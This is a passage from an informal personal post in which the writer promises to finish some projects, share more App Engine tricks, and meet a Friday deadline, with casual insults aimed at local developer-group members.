be completed and am here calling GTUG Ghana developers slackers which
got me into a lamer argument with a retard ^^

So I'll do my best to complete them because they are great and cool and
I'll try to share more appengine tricks these are not the only ones I
have found or done but then again I have to complete a project by Friday
and I have barely started.

ok Bye :)